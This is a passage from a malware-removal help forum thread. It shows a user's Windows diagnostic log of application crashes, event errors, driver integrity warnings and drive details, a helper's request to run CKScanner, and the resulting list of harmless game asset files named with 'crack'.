==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/23/2014 05:45:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x2364
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:35:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x6004
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:34:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x049438d0
Faulting process id: 0x3c34
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (10/23/2014 05:34:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
 
Error: (10/23/2014 05:33:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x048f38d0
Faulting process id: 0x4824
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (10/23/2014 05:33:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
 
Error: (10/23/2014 05:11:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: KERNELBASE.dll, version: 6.2.9200.16451, time stamp: 0x50988950
Exception code: 0x000006a6
Fault offset: 0x00014b32
Faulting process id: 0xec7c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:09:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x6128
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 04:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x188e4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 04:47:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Steam.exe, version: 2.45.19.81, time stamp: 0x54457aa7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x04b1098c
Faulting process id: 0x2438
Faulting application start time: 0xSteam.exe0
Faulting application path: Steam.exe1
Faulting module path: Steam.exe2
Report Id: Steam.exe3
Faulting package full name: Steam.exe4
Faulting package-relative application ID: Steam.exe5
 
 
System errors:
=============
Error: (10/23/2014 06:30:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 40.
 
Error: (10/23/2014 06:29:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 40.
 
Error: (10/23/2014 05:46:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:25 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:18 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:18 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:17 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:17 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
Microsoft Office Sessions:
=========================
Error: (10/23/2014 05:45:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0236401cfef0a39b5726fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlleda2960e-5afd-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:35:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0600401cfef094bf7b762C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll8d4c699f-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:34:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c0000005049438d03c3401cfef092aab8955C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknown6cc9faca-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:34:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
 
Error: (10/23/2014 05:33:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c0000005048f38d0482401cfef0904e14f20C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknown49fc7778-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:33:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (10/23/2014 05:11:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888aKERNELBASE.dll6.2.9200.1645150988950000006a600014b32ec7c01cfef05ca21738dC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\KERNELBASE.dll263c0aba-5af9-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:09:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0612801cfef059b781fa1C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlle337a2e5-5af8-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 04:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0188e401cfef02e36e2bfbC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll2408d701-5af6-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 04:47:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Steam.exe2.45.19.8154457aa7unknown0.0.0.000000000c000041d04b1098c243801cfef02375bf9e6C:\Program Files (x86)\Steam\Steam.exeunknowncda71694-5af5-11e4-bf1c-3085a9a720f7
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-12-16 21:57:35.239
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-16 21:57:26.378
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:33.532
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:09.428
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:31.388
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:10.452
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:36.351
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:17.007
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:24.425
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:18.107
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: AMD A8-5500 APU with Radeon™ HD Graphics 
Percentage of memory in use: 83%
Total physical RAM: 8156.38 MB
Available physical RAM: 1323.22 MB
Total Pagefile: 16348.38 MB
Available Pagefile: 7349.44 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:918.55 GB) (Free:34.85 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (Tablet_CD) (CDROM) (Total:0.12 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5F075A5E)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#10 Naathim

Posted 24 October 2014 - 01:31 AM


Scan with CKScanner

Download CKScanner by askey127 and save it to your desktop.

  • Right-click on the CKScanner icon and select Run as Administrator to start the tool.
  • Click Search For Files.
  • When finished, click Save List To File.
  • Remember to run this tool once only, if not asked to run it again.

Please include the content of CKFiles.txt in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 



#11 RaRWolf


Posted 25 October 2014 - 03:04 PM

CKScanner stops responding when I click Search For Files



#12 Naathim


Posted 26 October 2014 - 05:16 AM

Strange. Please reboot the machine and try again.


Radek Naathim Pawelczyk

Malware Removal Specialist

 



#13 RaRWolf


Posted 26 October 2014 - 08:08 PM

CKScanner 2.4 - Additional Security Risks - These are not necessarily bad
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.material
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.model
c:\program files (x86)\steam\steamapps\common\projectzomboid\media\sound\crackwood.ogg
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\blend_shred_crackedconcrete.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\blend_shred_crackedconcrete.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\shred_crackedconcretea.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\shred_crackedconcreteb.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman1.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman1.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman2.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman2.vtf
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\bin\scene\crack.scene
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\sounds\stones\afterlaserstonecrackshort1.ogg
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\sounds\stones\stonecrack02.ogg
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack3.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack3.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack1.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack1.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack3.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack3.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack4.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack4.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack5.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack5.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\floorcrack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\floorcrack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_01.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_03.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_03.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_04.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_04.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_05.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_05.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.dx80.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.dx90.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.mdl
